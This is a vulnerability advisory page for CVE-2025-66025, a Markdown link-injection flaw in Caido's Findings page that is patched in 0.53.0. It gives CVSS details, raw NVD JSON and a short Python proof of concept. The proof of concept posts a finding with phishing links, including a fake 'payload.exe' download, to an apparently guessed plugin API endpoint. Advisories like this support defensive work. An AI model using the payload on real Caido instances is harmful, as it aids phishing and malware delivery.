Security Vulnerability Report
中文
CVE-2025-66025 CVSS 4.3 MEDIUM

CVE-2025-66025

Published: 2025-11-26 03:15:58
Last Modified: 2026-04-15 00:35:42

Description

Caido is a web security auditing toolkit. Prior to version 0.53.0, the Markdown renderer used in Caido’s Findings page improperly handled user-supplied Markdown, allowing attacker-controlled links to be rendered without confirmation. When a user opened a finding generated through the scanner, or other plugins, clicking these injected links could redirect the Caido application to an attacker-controlled domain, enabling phishing style attacks. This issue has been patched in version 0.53.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Caido < 0.53.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66025 PoC - Caido Markdown Link Injection # This PoC demonstrates how an attacker can inject malicious links into Caido findings # Malicious Markdown payload for Caido findings page malicious_markdown = ''' ## Security Finding Please review the following vulnerability details: - **Vulnerability**: SQL Injection in login form - **Severity**: High - **Reference**: [View Detailed Report](https://attacker-controlled-site.com/phishing) - **Additional Info**: [Download Patch](https://malicious-download.com/payload.exe) For more information, visit our [security advisory](https://fake-caido-security.com). ''' # When rendered in Caido's Findings page, these links appear as legitimate # security references but actually redirect to attacker-controlled domains # Example exploitation via plugin API: import requests target = "http://target-caido-instance:8080" api_endpoint = f"{target}/api/v1/findings" payload = { "title": "Vulnerability Detected", "description": malicious_markdown, "severity": "high" } # Attack: Inject malicious links through plugin interface response = requests.post(api_endpoint, json=payload) print(f"Injected malicious finding: {response.status_code}") # User viewing this finding will see legitimate-looking links # but clicking them redirects to attacker-controlled domains

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66025", "sourceIdentifier": "[email protected]", "published": "2025-11-26T03:15:58.277", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Caido is a web security auditing toolkit. Prior to version 0.53.0, the Markdown renderer used in Caido’s Findings page improperly handled user-supplied Markdown, allowing attacker-controlled links to be rendered without confirmation. When a user opened a finding generated through the scanner, or other plugins, clicking these injected links could redirect the Caido application to an attacker-controlled domain, enabling phishing style attacks. This issue has been patched in version 0.53.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "references": [{"url": "https://github.com/caido/caido/security/advisories/GHSA-cf52-h5mw-gmc2", "source": "[email protected]"}]}}